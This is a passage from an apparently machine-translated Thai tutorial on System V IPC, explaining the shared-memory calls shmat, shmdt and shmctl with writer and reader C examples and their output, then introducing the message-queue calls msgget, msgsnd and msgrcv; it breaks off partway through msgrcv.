การเรียกนี้จะส่งคืนตัวระบุหน่วยความจำแบบแบ่งใช้ที่ถูกต้อง (ใช้สำหรับการเรียกหน่วยความจำที่แชร์เพิ่มเติม) เมื่อสำเร็จและ -1 ในกรณีที่เกิดความล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

#include <sys/types.h>
#include <sys/shm.h>

void * shmat(int shmid, const void *shmaddr, int shmflg)

การเรียกระบบข้างต้นดำเนินการดำเนินการหน่วยความจำแบบแบ่งใช้สำหรับเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ System V นั่นคือการแนบเซ็กเมนต์หน่วยความจำแบบแบ่งใช้กับพื้นที่แอดเดรสของกระบวนการโทร อาร์กิวเมนต์ที่ต้องส่งผ่านมีดังนี้ -

The first argument, shmid,เป็นตัวระบุของเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ id นี้คือตัวระบุหน่วยความจำแบบแบ่งใช้ซึ่งเป็นค่าส่งคืนของการเรียกระบบ shmget ()

The second argument, shmaddr,คือการระบุที่อยู่ที่แนบ ถ้า shmaddr เป็น NULL ระบบจะเลือกแอดเดรสที่เหมาะสมเพื่อแนบเซ็กเมนต์ตามค่าเริ่มต้น ถ้า shmaddr ไม่ใช่ NULL และ SHM_RND ถูกระบุใน shmflg ไฟล์แนบจะเท่ากับแอดเดรสของ SHMLBA ที่อยู่ใกล้ที่สุด (Lower Boundary Address) มิฉะนั้น shmaddr ต้องเป็นที่อยู่ที่จัดแนวหน้าที่ซึ่งการแนบหน่วยความจำแบบแบ่งใช้เกิดขึ้น / เริ่มทำงาน

The third argument, shmflg, ระบุแฟล็กหน่วยความจำที่ใช้ร่วมกันที่ต้องการเช่น SHM_RND (ปัดเศษแอดเดรสออกเป็น SHMLBA) หรือ SHM_EXEC (อนุญาตให้เรียกใช้เนื้อหาของเซ็กเมนต์) หรือ SHM_RDONLY (แนบเซ็กเมนต์เพื่อวัตถุประสงค์แบบอ่านอย่างเดียวโดยค่าเริ่มต้นจะเป็นแบบอ่าน - เขียน) หรือ SHM_REMAP (แทนที่การแม็ปที่มีอยู่ในช่วงที่ระบุโดย shmaddr และดำเนินการต่อไปจนถึงจุดสิ้นสุดของเซ็กเมนต์)

การเรียกนี้จะส่งคืนที่อยู่ของเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ที่แนบมาเมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

#include <sys/types.h>
#include <sys/shm.h>

int shmdt(const void *shmaddr)

การเรียกระบบข้างต้นดำเนินการดำเนินการหน่วยความจำแบบแบ่งใช้สำหรับเซ็กเมนต์หน่วยความจำที่ใช้ร่วมกันของ System V ในการแยกเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ออกจากพื้นที่แอดเดรสของกระบวนการโทร ข้อโต้แย้งที่ต้องผ่านคือ -

อาร์กิวเมนต์ shmaddr คือที่อยู่ของเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ที่จะแยกออก ส่วนที่จะแยกออกต้องเป็นที่อยู่ที่ส่งคืนโดยการเรียกระบบ shmat ()

การโทรนี้จะส่งคืน 0 เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

#include <sys/ipc.h>
#include <sys/shm.h>

int shmctl(int shmid, int cmd, struct shmid_ds *buf)

การเรียกระบบข้างต้นดำเนินการควบคุมการดำเนินการสำหรับเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ System V จำเป็นต้องส่งผ่านอาร์กิวเมนต์ต่อไปนี้ -

อาร์กิวเมนต์แรก shmid เป็นตัวระบุของเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ id นี้คือตัวระบุหน่วยความจำแบบแบ่งใช้ซึ่งเป็นค่าส่งคืนของการเรียกระบบ shmget ()

อาร์กิวเมนต์ที่สอง cmd เป็นคำสั่งเพื่อดำเนินการควบคุมที่จำเป็นบนเซ็กเมนต์หน่วยความจำแบบแบ่งใช้

ค่าที่ถูกต้องสำหรับ cmd คือ -

  • IPC_STAT- คัดลอกข้อมูลของค่าปัจจุบันของแต่ละสมาชิกของ struct shmid_ds ไปยังโครงสร้างที่ส่งผ่านที่ชี้โดย buf คำสั่งนี้ต้องการสิทธิ์ในการอ่านสำหรับเซ็กเมนต์หน่วยความจำแบบแบ่งใช้

  • IPC_SET - ตั้งค่า ID ผู้ใช้ ID กลุ่มของเจ้าของสิทธิ์ ฯลฯ ที่ชี้ไปตามโครงสร้าง buf

  • IPC_RMID- ทำเครื่องหมายส่วนที่จะทำลาย เซ็กเมนต์จะถูกทำลายหลังจากกระบวนการสุดท้ายถอดออกแล้วเท่านั้น

  • IPC_INFO - ส่งคืนข้อมูลเกี่ยวกับขีด จำกัด หน่วยความจำแบบแบ่งใช้และพารามิเตอร์ในโครงสร้างที่ชี้โดย buf

  • SHM_INFO - ส่งคืนโครงสร้าง shm_info ที่มีข้อมูลเกี่ยวกับทรัพยากรระบบที่ใช้โดยหน่วยความจำแบบแบ่งใช้

อาร์กิวเมนต์ที่สาม buf เป็นตัวชี้ไปยังโครงสร้างหน่วยความจำแบบแบ่งใช้ที่ชื่อ struct shmid_ds ค่าของโครงสร้างนี้จะถูกใช้สำหรับ set หรือ get ตาม cmd

การเรียกนี้ส่งคืนค่าขึ้นอยู่กับคำสั่งที่ผ่าน เมื่อ IPC_INFO สำเร็จและ SHM_INFO หรือ SHM_STAT จะส่งกลับดัชนีหรือตัวระบุของเซ็กเมนต์หน่วยความจำแบบแบ่งใช้หรือ 0 สำหรับการดำเนินการอื่น ๆ และ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

ให้เราพิจารณาโปรแกรมตัวอย่างต่อไปนี้

  • สร้างสองกระบวนการหนึ่งใช้สำหรับการเขียนลงในหน่วยความจำที่ใช้ร่วมกัน (shm_write.c) และอีกกระบวนการหนึ่งสำหรับการอ่านจากหน่วยความจำแบบแบ่งใช้ (shm_read.c)

  • โปรแกรมดำเนินการเขียนลงในหน่วยความจำแบบแบ่งใช้โดยกระบวนการเขียน (shm_write.c) และอ่านจากหน่วยความจำแบบแบ่งใช้โดยกระบวนการอ่าน (shm_read.c)

  • ในหน่วยความจำแบบแบ่งใช้กระบวนการเขียนสร้างหน่วยความจำแบบแบ่งใช้ขนาด 1K (และแฟล็ก) และแนบหน่วยความจำแบบแบ่งใช้

  • กระบวนการเขียนจะเขียนตัวอักษร 5 เท่าจาก 'A' ถึง 'E' จาก 1,023 ไบต์ในหน่วยความจำที่ใช้ร่วมกัน ไบต์สุดท้ายหมายถึงการสิ้นสุดของบัฟเฟอร์

  • กระบวนการอ่านจะอ่านจากหน่วยความจำที่แบ่งใช้และเขียนไปยังเอาต์พุตมาตรฐาน

  • การอ่านและการเขียนกระบวนการดำเนินการพร้อมกัน

  • หลังจากเขียนเสร็จกระบวนการเขียนจะอัพเดตเพื่อระบุว่าการเขียนลงในหน่วยความจำแบบแบ่งใช้เสร็จสมบูรณ์ (พร้อมตัวแปรที่สมบูรณ์ใน struct shmseg)

  • กระบวนการอ่านดำเนินการอ่านจากหน่วยความจำแบบแบ่งใช้และแสดงบนเอาต์พุตจนกว่าจะได้รับการบ่งชี้ว่ากระบวนการเขียนเสร็จสิ้น (ตัวแปรที่สมบูรณ์ใน struct shmseg)

  • ดำเนินกระบวนการอ่านและเขียนสองสามครั้งเพื่อความเรียบง่ายและเพื่อหลีกเลี่ยงการวนซ้ำที่ไม่สิ้นสุดและทำให้โปรแกรมซับซ้อน

ต่อไปนี้เป็นรหัสสำหรับกระบวนการเขียน (การเขียนลงในหน่วยความจำที่ใช้ร่วมกัน - ไฟล์: shm_write.c)

/* Filename: shm_write.c */
#include<stdio.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/types.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>
#include<unistd.h>
#include<string.h>

#define BUF_SIZE 1024
#define SHM_KEY 0x1234

struct shmseg {
   int cnt;
   int complete;
   char buf[BUF_SIZE];
};
int fill_buffer(char * bufptr, int size);

int main(int argc, char *argv[]) {
   int shmid, numtimes;
   struct shmseg *shmp;
   char *bufptr;
   int spaceavailable;
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);
   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }
   
   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   if (shmp == (void *) -1) {
      perror("Shared memory attach");
      return 1;
   }
   
   /* Transfer blocks of data from buffer to shared memory */
   bufptr = shmp->buf;
   spaceavailable = BUF_SIZE;
   for (numtimes = 0; numtimes < 5; numtimes++) {
      shmp->cnt = fill_buffer(bufptr, spaceavailable);
      shmp->complete = 0;
      printf("Writing Process: Shared Memory Write: Wrote %d bytes\n", shmp->cnt);
      bufptr = shmp->buf;
      spaceavailable = BUF_SIZE;
      sleep(3);
   }
   printf("Writing Process: Wrote %d times\n", numtimes);
   shmp->complete = 1;

   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }

   if (shmctl(shmid, IPC_RMID, 0) == -1) {
      perror("shmctl");
      return 1;
   }
   printf("Writing Process: Complete\n");
   return 0;
}

int fill_buffer(char * bufptr, int size) {
   static char ch = 'A';
   int filled_count;
   
   //printf("size is %d\n", size);
   memset(bufptr, ch, size - 1);
   bufptr[size-1] = '\0';
   if (ch > 122)
   ch = 65;
   if ( (ch >= 65) && (ch <= 122) ) {
      if ( (ch >= 91) && (ch <= 96) ) {
         ch = 65;
      }
   }
   filled_count = strlen(bufptr);
   
   //printf("buffer count is: %d\n", filled_count);
   //printf("buffer filled is:%s\n", bufptr);
   ch++;
   return filled_count;
}

ขั้นตอนการรวบรวมและดำเนินการ

Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Shared Memory Write: Wrote 1023 bytes
Writing Process: Wrote 5 times
Writing Process: Complete

ต่อไปนี้เป็นรหัสสำหรับกระบวนการอ่าน (การอ่านจากหน่วยความจำที่ใช้ร่วมกันและเขียนไปยังเอาต์พุตมาตรฐาน - ไฟล์: shm_read.c)

/* Filename: shm_read.c */
#include<stdio.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/types.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>

#define BUF_SIZE 1024
#define SHM_KEY 0x1234

struct shmseg {
   int cnt;
   int complete;
   char buf[BUF_SIZE];
};

int main(int argc, char *argv[]) {
   int shmid;
   struct shmseg *shmp;
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);
   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }
   
   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   if (shmp == (void *) -1) {
      perror("Shared memory attach");
      return 1;
   }
   
   /* Transfer blocks of data from shared memory to stdout*/
   while (shmp->complete != 1) {
      printf("segment contains : \n\"%s\"\n", shmp->buf);
      if (shmp->cnt == -1) {
         perror("read");
         return 1;
      }
      printf("Reading Process: Shared Memory: Read %d bytes\n", shmp->cnt);
      sleep(3);
   }
   printf("Reading Process: Reading Done, Detaching Shared Memory\n");
   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }
   printf("Reading Process: Complete\n");
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

segment contains :
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
Reading Process: Shared Memory: Read 1023 bytes
segment contains :
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
Reading Process: Shared Memory: Read 1023 bytes
segment contains :
"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
Reading Process: Shared Memory: Read 1023 bytes
segment contains :
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
Reading Process: Shared Memory: Read 1023 bytes
segment contains :
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
Reading Process: Shared Memory: Read 1023 bytes
Reading Process: Reading Done, Detaching Shared Memory
Reading Process: Complete

ทำไมเราต้องมีคิวข้อความเมื่อเรามีหน่วยความจำที่ใช้ร่วมกันอยู่แล้ว? อาจมีหลายเหตุผลให้เราลองแบ่งประเด็นนี้ออกเป็นหลาย ๆ จุดเพื่อให้ง่ายขึ้น -

  • ตามที่เข้าใจแล้วเมื่อได้รับข้อความจากกระบวนการแล้วกระบวนการอื่นจะไม่สามารถใช้ได้อีกต่อไป ในขณะที่หน่วยความจำแบบแบ่งใช้ข้อมูลจะพร้อมใช้งานสำหรับกระบวนการต่างๆในการเข้าถึง

  • หากเราต้องการสื่อสารด้วยรูปแบบข้อความขนาดเล็ก

  • ข้อมูลหน่วยความจำที่ใช้ร่วมกันจำเป็นต้องได้รับการป้องกันด้วยการซิงโครไนซ์เมื่อหลายกระบวนการสื่อสารในเวลาเดียวกัน

  • ความถี่ในการเขียนและอ่านโดยใช้หน่วยความจำที่ใช้ร่วมกันนั้นสูงดังนั้นการใช้ฟังก์ชันนี้จะซับซ้อนมาก ไม่คุ้มกับการใช้ประโยชน์ในกรณีแบบนี้

  • จะเกิดอะไรขึ้นถ้ากระบวนการทั้งหมดไม่จำเป็นต้องเข้าถึงหน่วยความจำที่ใช้ร่วมกัน แต่มีกระบวนการน้อยมากที่ต้องการเพียงแค่ใช้งานกับคิวข้อความจะดีกว่า

  • หากเราต้องการสื่อสารกับแพ็กเก็ตข้อมูลที่แตกต่างกันให้พูดว่ากระบวนการ A กำลังส่งข้อความประเภท 1 เพื่อประมวลผล B ข้อความประเภท 10 เพื่อประมวลผล C และข้อความประเภท 20 เพื่อประมวลผล D ในกรณีนี้การใช้คิวข้อความจะง่ายกว่า เพื่อลดความซับซ้อนของประเภทข้อความที่กำหนดให้เป็น 1, 10, 20 อาจเป็น 0 หรือ + ve หรือ –ve ตามที่กล่าวไว้ด้านล่าง

  • แน่นอนลำดับของคิวข้อความคือ FIFO (เข้าก่อนออกก่อน) ข้อความแรกที่แทรกในคิวคือข้อความแรกที่จะถูกเรียก

การใช้หน่วยความจำที่ใช้ร่วมกันหรือคิวข้อความขึ้นอยู่กับความต้องการของแอปพลิเคชันและวิธีการใช้งานได้อย่างมีประสิทธิภาพ

การสื่อสารโดยใช้คิวข้อความสามารถเกิดขึ้นได้ด้วยวิธีต่อไปนี้ -

  • การเขียนลงในหน่วยความจำแบบแบ่งใช้โดยกระบวนการหนึ่งและอ่านจากหน่วยความจำแบบแบ่งใช้โดยกระบวนการอื่น ดังที่ทราบกันดีว่าการอ่านสามารถทำได้โดยใช้กระบวนการหลายขั้นตอนเช่นกัน

  • การเขียนลงในหน่วยความจำแบบแบ่งใช้โดยกระบวนการเดียวที่มีแพ็กเก็ตข้อมูลที่แตกต่างกันและการอ่านจากมันโดยหลายกระบวนการเช่นตามประเภทข้อความ

เมื่อเห็นข้อมูลบางอย่างเกี่ยวกับคิวข้อความตอนนี้ถึงเวลาตรวจสอบการเรียกระบบ (System V) ซึ่งรองรับคิวข้อความ

ในการดำเนินการสื่อสารโดยใช้คิวข้อความให้ทำตามขั้นตอนต่อไปนี้ -

Step 1 - สร้างคิวข้อความหรือเชื่อมต่อกับคิวข้อความที่มีอยู่แล้ว (msgget ())

Step 2 - เขียนลงในคิวข้อความ (msgsnd ())

Step 3 - อ่านจากคิวข้อความ (msgrcv ())

Step 4 - ดำเนินการควบคุมบนคิวข้อความ (msgctl ())

ตอนนี้ให้เราตรวจสอบไวยากรณ์และข้อมูลบางอย่างเกี่ยวกับการโทรข้างต้น

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

int msgget(key_t key, int msgflg)

การเรียกระบบนี้สร้างหรือจัดสรรคิวข้อความ System V ต่อไปนี้อาร์กิวเมนต์จะต้องผ่าน -

  • อาร์กิวเมนต์แรกคีย์จดจำคิวข้อความ คีย์อาจเป็นได้ทั้งค่าตามอำเภอใจหรือค่าที่ได้มาจากฟังก์ชันไลบรารี ftok ()

  • อาร์กิวเมนต์ที่สอง shmflg ระบุแฟล็กคิวข้อความที่ต้องการเช่น IPC_CREAT (การสร้างคิวข้อความหากไม่มีอยู่) หรือ IPC_EXCL (ใช้กับ IPC_CREAT เพื่อสร้างคิวข้อความและการเรียกล้มเหลวหากมีคิวข้อความอยู่แล้ว) จำเป็นต้องผ่านการอนุญาตเช่นกัน

Note - ดูส่วนก่อนหน้าสำหรับรายละเอียดเกี่ยวกับสิทธิ์

การเรียกนี้จะส่งคืนตัวระบุคิวข้อความที่ถูกต้อง (ใช้สำหรับการเรียกคิวข้อความเพิ่มเติม) เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

ข้อผิดพลาดต่างๆที่เกี่ยวข้องกับการเรียกนี้ ได้แก่ EACCESS (การอนุญาตถูกปฏิเสธ) EEXIST (ไม่สามารถสร้างคิวได้แล้ว) ENOENT (ไม่มีคิว) ENOMEM (หน่วยความจำไม่เพียงพอที่จะสร้างคิว) เป็นต้น

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

int msgsnd(int msgid, const void *msgp, size_t msgsz, int msgflg)

การเรียกระบบนี้จะส่ง / ต่อท้ายข้อความในคิวข้อความ (System V) ต่อไปนี้อาร์กิวเมนต์จะต้องผ่าน -

  • อาร์กิวเมนต์แรก msgid รู้จักคิวข้อความเช่นตัวระบุคิวข้อความ ค่าตัวระบุจะได้รับเมื่อสำเร็จของ msgget ()

  • อาร์กิวเมนต์ที่สอง msgp เป็นตัวชี้ไปยังข้อความที่ส่งไปยังผู้เรียกซึ่งกำหนดไว้ในโครงสร้างของรูปแบบต่อไปนี้ -

struct msgbuf {
   long mtype;
   char mtext[1];
};

ตัวแปร mtype ใช้สำหรับการสื่อสารกับข้อความประเภทต่างๆอธิบายโดยละเอียดในการเรียก msgrcv () ตัวแปร mtext คืออาร์เรย์หรือโครงสร้างอื่น ๆ ที่ระบุขนาดโดย msgsz (ค่าบวก) หากไม่ได้กล่าวถึงช่อง mtext จะถือว่าเป็นข้อความขนาดศูนย์ซึ่งได้รับอนุญาต

  • อาร์กิวเมนต์ที่สาม msgsz คือขนาดของข้อความ (ข้อความควรลงท้ายด้วยอักขระ null)

  • อาร์กิวเมนต์ที่สี่ msgflg ระบุแฟล็กบางอย่างเช่น IPC_NOWAIT (ส่งกลับทันทีเมื่อไม่พบข้อความในคิวหรือ MSG_NOERROR (ตัดทอนข้อความหากมีมากกว่า msgsz ไบต์)

การโทรนี้จะส่งคืน 0 เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

int msgrcv(int msgid, const void *msgp, size_t msgsz, long msgtype, int msgflg)

การเรียกระบบนี้ดึงข้อความจากคิวข้อความ (System V) ต่อไปนี้อาร์กิวเมนต์จะต้องผ่าน -

  • อาร์กิวเมนต์แรก msgid รู้จักคิวข้อความเช่นตัวระบุคิวข้อความ ค่าตัวระบุจะได้รับเมื่อสำเร็จของ msgget ()

